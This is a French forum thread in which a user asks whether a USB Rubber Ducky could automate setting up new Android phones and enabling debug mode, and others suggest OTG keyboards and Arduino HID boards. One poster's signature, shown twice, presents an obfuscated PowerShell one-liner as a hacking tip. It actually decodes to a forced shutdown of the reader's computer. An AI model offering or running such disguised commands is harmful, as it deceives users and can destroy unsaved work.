Annonce

Réduire
Aucune annonce.

Préparer et débuger des smartphones android avec ‘USB Rubber Ducky’

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Préparer et débuger des smartphones android avec ‘USB Rubber Ducky’

    Bonjour, et merci pour ce forum ou j’espère trouver des réponses,
    Pensez vous qu’il est possible de programmer une séquence qui une fois la ‘USB Rubber Ducky’
    inséré dans le téléphone pourrait simuler les actions à faire sur l’écran pour initialiser le téléphone
    comme si je venais de l’acheter et aller dans les paramètres pour en modifier certain don le mode débogage ?
    Merci.

  • #2
    Salut Savana ! Le tel sous Android ?(je suppose que oui vue le tag ) Je crois que le Rubber support OSx, Win, et Linux uniquement..

    Je comprend pas bien ce que tu veut faire..


    Tu veut que quand tu plug ton Rubber sur un Tel android, il simule un affichage d'origine ?
    Outu veut le remettre comme il etait a l'achat ('vide') sans utiliser l'écran du smartphone ?

    Pour ce qui est d'activer le débug mode je connais que la façon classic qui est de tapé sur le numéro de serie ^^ un prog doit pouvoir faire ca mais faut que tu le code toi méme je pensse.. Dit nous plus précisement ce que tu veut faire et le matos que tu utilise on pourras surement t'orienter !


    Voila amicalement ! Unamed



    "Please do not use in military or secret service, or for illegal purposes."

    Commentaire


    • #3
      Salut Unamed !

      Je vais essayer d'expliquer plus clairement ma demande.
      Mon job est de préparer par centaines des téléphones android reçu neuf du fabriquant et de les préparer pour y installer une application métier non-google.
      Donc je dois ouvrir la boite du tel, mettre la batterie, le démarrer, accepter les conditions d'utilisation, valider la date et l'heure, etc
      puis le mettre en mode débogage en allant dans paramètre, le mettre en mode débogage pour pouvoir dans un deuxième temps en commande adb installer
      des applications. Pour installer des applications toutes ses manipulation préalable sont nécessaires.


      Mon idée c'est d'utiliser la ‘USB Rubber Ducky’ ou tout autre procédés pour une fois connecté au téléphone et démarrer le téléphone cela simule les actions que je devrais
      faire normalement avec le doigt sur l’écran pour : accepter les conditions d'utilisation, valider la date et l'heure, etc
      puis le mettre en mode débogage en allant dans paramètre, le mettre en mode débogage...


      Je ne sais pas si c'est possible mais on peut toujours essayer.

      C'est promis ce n'est ni pour l'armée, ni les services secrets ni pour des actions illégale

      Merci Unamed, j'ai mis de la couleur tu as raison c'est plus sympa.

      Commentaire


      • #4
        Hello,

        le truc c'est que ça dépend vraiment de ta procédure d'installation.
        L'idéal serait de faire un test en achetant simplement un cordon "USB On-the-Go (OTG)" (ça coute moins de 2€)
        Et tu test si t'arrives à dérouler ta procédure avec un clavier physique dans un premier temps.

        Si ça fonctionne, ça fonctionnera avec une Ducky. Te restera plus qu'a transposer ta procédure d'installation en payload Ducky.
        Bon par contre si tu veux paralléliser le truc (genre préparer 10 tels à la fois avec 10 Ducky), le souci des Ducky c'est que c'est super cher pour ce que c'est : il sera alors temps de te renseigner un peu sur d'autres possibilités :
        https://www.arduino.cc/en/Reference/HID
        https://fr.aliexpress.com/item/Cactu...318391529.html
        ...

        Tiens nous au courant, c'est intéressant

        ./Kriss

        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Je pense que cette demande devrait être faite directement sur le site officiel de cette clé, en contactant l'auteur et en expliquant bien le besoin.

          Commentaire


          • #6
            Hello ! désolé j'avais pas compris,

            Je ne connais pas trop android, mais serait-il possible de crée un executable autorun ? KrissCool a raison c'est cher le Rubber ! un auto run sur micro sd serais bien moin cher !

            Je dit peut etre nimporte quoi.. mais c'est comme ca que l'on apprend ^^, je fait quelques recherches je trouve rien sur le sujet.. si vous avez des infos !
            "Please do not use in military or secret service, or for illegal purposes."

            Commentaire


            • #7
              Salut Krisscool !

              Merci pour ta réponse, effectivement j'ai testé avec un clavier USB avec l'adaptateur à 2€ mais il n'est pas détecté par le téléphone donc cela me parait peut probable
              de pouvoir connecter un système utilisant le port USB pour automatiser le débogage, reste un robot mécanique avec un doigt en silicone et programmer la séquence
              d'action sur l'écran. C'est tout de suite plus complexe !

              Commentaire


              • #8
                Salut Unamed !

                Je pense que tous les accès au système Android par des accès externe sois tous simplement impossible tant que le système n'est pas préparer par les étapes que je réalise à la main.
                A creuser et je fais passer les infos que je trouve sur le sujet.

                Commentaire


                • #9
                  Re, j'ai oublié de préciser mais, t'as vérifié si le modèle des tel que tu prépares est compatible nativement OTG ? Pour certains, faut passer par la case root, et là forcément, plus aucun intérêt.
                  Si ça passe pas, je crains qu'il n'y ai pas de solution :'



                  Hack like a pro :
                  PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                  Commentaire


                  • #10
                    Salut Krisscool !

                    Merci pour l'info "nativement OTG" c'est une info que je n'avais pas ! Effectivement tous les téléphone n’ont pas cette fonction.
                    Il serait possible de réaliser le projet uniquement sur des téléphones nativement OTG ? avec la ‘USB Rubber Ducky’ ?
                    Ou puis je trouver les info de programmation, sur le lien que tu as indiqué ? https://www.arduino.cc/reference/en/
                    Merci pour tes réponses qui font avancer le schmilblick

                    Commentaire

                    Chargement...
                    X